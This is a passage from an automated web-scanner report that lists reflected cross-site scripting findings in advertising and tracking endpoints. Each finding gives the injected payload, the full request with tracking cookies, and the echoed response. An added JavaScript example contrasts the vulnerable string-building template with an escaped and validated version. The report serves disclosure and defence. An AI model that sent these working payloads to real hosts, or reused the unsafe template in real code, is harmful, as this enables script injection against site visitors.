function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="526735";var ct="80710";var cf="300X250d5a22";alert(1)//61ab18cb0e";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var
...[SNIP]...

1.259. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b05a"%3balert(1)//b16ea565ed2 was submitted in the cwheight parameter. This input was echoed as 2b05a";alert(1)//b16ea565ed2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=526735&cwwidth=300&cwheight=2502b05a"%3balert(1)//b16ea565ed2&cwpnet=1&cwtagid=80710 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=292|1|-8589035730497595512|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F15%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F06%2F2011%3BFOCI1%0A749%3B02%2F19%2F2011%3BDOTM2%0A2532%3B03%2F15%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB25
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: 425375877
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 14 Feb 2011 01:36:41 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="526735";var ct="80710";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="2502b05a";alert(1)//b16ea565ed2";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var
...[SNIP]...

1.260. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5805"%3balert(1)//d5cbc1d5373 was submitted in the cwpid parameter. This input was echoed as d5805";alert(1)//d5cbc1d5373 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=526735d5805"%3balert(1)//d5cbc1d5373&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=80710 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=292|1|-8589035730497595512|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F15%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F06%2F2011%3BFOCI1%0A749%3B02%2F19%2F2011%3BDOTM2%0A2532%3B03%2F15%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB29
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: 1234736425
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 14 Feb 2011 01:36:40 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="526735d5805";alert(1)//d5cbc1d5373";var ct="80710";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase(
...[SNIP]...

1.261. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2115"%3balert(1)//841766d65cd was submitted in the cwpnet parameter. This input was echoed as d2115";alert(1)//841766d65cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=526735&cwwidth=300&cwheight=250&cwpnet=1d2115"%3balert(1)//841766d65cd&cwtagid=80710 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=292|1|-8589035730497595512|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F15%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F06%2F2011%3BFOCI1%0A749%3B02%2F19%2F2011%3BDOTM2%0A2532%3B03%2F15%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB20
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: 1501704869
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 14 Feb 2011 01:36:41 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="526735";var ct="80710";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1d2115";alert(1)//841766d65cd";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=naviga
...[SNIP]...
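The JavaScript string-context reflections of findings 1.257 through 1.261 (and 1.262 below), rebuilt as an added example; this is not code from the report or from the ContextWeb tag server. Only the variable names (cp, ct, cf, ca, cr, cw, ch, cn), their default values and the two payloads come from the captured responses; the template itself, the validation rules in invalidTagParams, and the names jsStringLiteral, buildTagScriptUnsafe, buildTagScriptSafe and runTagScript are a hypothetical reconstruction. The example executes each generated script with a counting stub in place of alert() to show what the injection actually does to the parsed program.

```javascript
// Added example; not code from the report or from the ContextWeb tag server.
// Rebuilds the opening of the getjs.aspx response of findings 1.257-1.262 two
// ways and executes each with the report's own payload. Template, validation
// rules and function names are a hypothetical reconstruction; only the
// variable names and default values come from the captured response.

// Defaults as they appear in the captured response.
const TAG_DEFAULTS = {
  cwpid: '526735', cwtagid: '80710', cwadformat: '300X250', action: 'VIEWAD',
  cwrun: '200', cwwidth: '300', cwheight: '250', cwpnet: '1',
};

// A JavaScript string literal that cannot leave its quotes, cannot close an
// enclosing <script> element, and survives the line terminators U+2028/U+2029
// (which JSON.stringify leaves raw).
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Validation the escaper cannot provide: the IDs and sizes are numbers, the
// action is a known value, the format is WxH. Returns the names of the
// parameters that fail so the caller can refuse the request. The action set is
// an assumption; VIEWAD is the only value that appears in the report.
function invalidTagParams(params) {
  const p = { ...TAG_DEFAULTS, ...params };
  const rules = {
    cwpid: /^\d{1,9}$/, cwtagid: /^\d{1,9}$/, cwrun: /^\d{1,4}$/, cwwidth: /^\d{1,4}$/,
    cwheight: /^\d{1,4}$/, cwpnet: /^\d{1,4}$/, cwadformat: /^\d{1,4}X\d{1,4}$/,
    action: /^VIEWAD$/,
  };
  return Object.keys(rules).filter((k) => !rules[k].test(String(p[k])));
}

// Vulnerable template: each query value is dropped between double quotes verbatim.
function buildTagScriptUnsafe(params) {
  const p = { ...TAG_DEFAULTS, ...params };
  return 'var cp="' + p.cwpid + '";var ct="' + p.cwtagid + '";var cf="' + p.cwadformat +
    '";var ca="' + p.action + '";var cr="' + p.cwrun + '";var cw="' + p.cwwidth +
    '";var ch="' + p.cwheight + '";var cn="' + p.cwpnet + '";';
}

// Hardened template: identical output for well-formed input, every value
// serialised as a literal. Call invalidTagParams() first and refuse on failure.
function buildTagScriptSafe(params) {
  const p = { ...TAG_DEFAULTS, ...params };
  const lit = jsStringLiteral;
  return 'var cp=' + lit(p.cwpid) + ';var ct=' + lit(p.cwtagid) + ';var cf=' + lit(p.cwadformat) +
    ';var ca=' + lit(p.action) + ';var cr=' + lit(p.cwrun) + ';var cw=' + lit(p.cwwidth) +
    ';var ch=' + lit(p.cwheight) + ';var cn=' + lit(p.cwpnet) + ';';
}

// Execute a generated script the way the browser would, with alert() replaced
// by a counter. Reports how often alert fired, what ca ended up holding, and
// whether the trailing declarations were swallowed by an injected // comment.
function runTagScript(code) {
  let alerts = 0;
  const probe = code + '\nreturn { ca: ca, truncated: typeof cn === "undefined" };';
  const out = new Function('alert', probe)(() => { alerts += 1; });
  return { alerts, ca: out.ca, truncated: out.truncated };
}
```

With the action payload from 1.257, the unsafe template fires alert once, leaves ca holding only VIEWADe7e01, and loses cr, cw, ch and cn to the // comment; the safe template fires nothing, stores the whole payload in ca, and keeps every declaration, while invalidTagParams flags action (and, for the 1.259 payload, cwheight) so the request never reaches the template at all.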

1.262. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e2ab"%3balert(1)//3a23d9c523b was submitted in the cwrun parameter. This input was echoed as 2e2ab";alert(1)//3a23d9c523b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=2002e2ab"%3balert(1)//3a23d9c523b&cwadformat=300X250&cwpid=526735&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=80710 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=292|1|-8589035730497595512|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F15%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F06%2F2011%3BFOCI1%0A749%3B02%2F19%2F2011%3BDOTM2%0A2532%3B03%2F15%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB27
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: -1603264243
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 14 Feb 2011 01:36:40 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="526735";var ct="80710";var cf="300X250";var ca="VIEWAD";var cr="2002e2ab";alert(1)//3a23d9c523b";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window
...[SNIP]...

1.263. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acba8"%3balert(1)//90c5667f5d3 was submitted in the cwtagid parameter. This input was echoed as acba8";alert(1)//90c5667f5d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=526735&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=80710acba8"%3balert(1)//90c5667f5d3 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=292|1|-8589035730497595512|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F15%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F06%2F2011%3BFOCI1%0A749%3B02%2F19%2F2011%3BDOTM2%0A2532%3B03%2F15%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB10
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: 1225335531
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 14 Feb 2011 01:36:41 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="526735";var ct="80710acba8";alert(1)//90c5667f5d3";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var
...[SNIP]...

1.264. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 342b1"%3balert(1)//732ac9a6f14 was submitted in the cwwidth parameter. This input was echoed as 342b1";alert(1)//732ac9a6f14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=526735&cwwidth=300342b1"%3balert(1)//732ac9a6f14&cwheight=250&cwpnet=1&cwtagid=80710 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=292|1|-8589035730497595512|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F15%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F06%2F2011%3BFOCI1%0A749%3B02%2F19%2F2011%3BDOTM2%0A2532%3B03%2F15%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB27
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: 1749599978
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 14 Feb 2011 01:36:40 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="526735";var ct="80710";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300342b1";alert(1)//732ac9a6f14";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="un
...[SNIP]...

1.265. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /partner/agent/rubicon/channels.js

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b959c%3balert(1)//31fa838f217 was submitted in the cb parameter. This input was echoed as b959c;alert(1)//31fa838f217 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner/agent/rubicon/channels.js?cb=b959c%3balert(1)//31fa838f217&pc=6005/12414 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://intermrkts.vo.llnwd.net/o35/u/ExtraCode/DrudgeReport/intermarkets.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_2081=CA-00000000456885722; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=usr3fd748acf5bcab14; put_1197=3297869551067506954; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_1994=6ch47d7o8wtv; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; xdp_ti="7 Feb 2011 22:48:47 GMT"; lm="7 Feb 2011 22:48:47 GMT"; csi15=667425.js^1^1297190267^1297190267&329267.js^1^1297190250^1297190250&3178297.js^1^1297190221^1297190221&3178300.js^1^1297186286^1297186286&3187866.js^2^1297186264^1297186285&3173809.js^1^1297186265^1297186265&3187311.js^2^1297186228^1297186247&3144082.js^1^1297186229^1297186229&3174520.js^1^1297185849^1297185849; csi2=3185375.js^3^1297190198^1297195331&3187864.js^6^1297186263^1297195302&329265.js^1^1297195268^1297195268&3140640.js^1^1297195255^1297195255&2415222.js^2^1297186265^1297186287&3162307.js^2^1297186245^1297186249&3187064.js^1^1297186232^1297186232&3138805.js^3^1297185842^1297186231&3144080.js^1^1297186227^1297186227&667421.js^1^1297186143^1297186143&3174518.js^1^1297185827^1297185827; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; cd=false; dq=42|5|37|0; ruid=154d290e46adc1d6f373dd09^15^1297646572^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6005/12414; rdk9=0; ses9=12414^1; csi9=3147455.js^1^1297646572^1297646572; rpb=2399%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%266286%3D1%266073%3D1%264214%3D1%262119%3D1%265722%3D1%264939%3D1%264940%3D1%264222%3D1%266457%3D1%266276%3D1%264212%3D1%266356%3D1%262372%3D1%264944%3D1%262374%3D1%264970%3D1%264894%3D1; put_1986=4760492999213801733

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:27:21 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript;charset=UTF-8
Content-Length: 946
Cache-control: private
Set-Cookie: khaos=GIPAEQ2D-C-IOYY; Domain=.rubiconproject.com; Expires=Tue, 12-Feb-2019 01:27:21 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close


var oo_profile={
tokenType : "0",
tracking : "4944",
tags : "Mortgage Refinance,Small Business,Business,Finance and Money,Finance,Inferred Male",
tagcloud : [
{ tag: "Mortgage Refinan
...[SNIP]...
4,2201,3513,2202,2496,2202,2496,2203,2204,2189,2112,2497,2205,2355,2495,5838,3811,3512,2109,3812,2239,2190,2206,2113,2206,2113,4552,2765,6184,2240,4105,4193,2372,2373,2374,2375,"}
]
};


try {
b959c;alert(1)//31fa838f217(oo_profile);
} catch(ignore) {}

1.266. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the adRotationId request parameter is copied into the HTML document as plain text between tags. The payload dd59d<script>alert(1)</script>8144e049832 was submitted in the adRotationId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047dd59d<script>alert(1)</script>8144e049832&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:55 GMT
Expires: Mon, 14 Feb 2011 01:41:55 GMT
Server: Microsoft-IIS/7.0
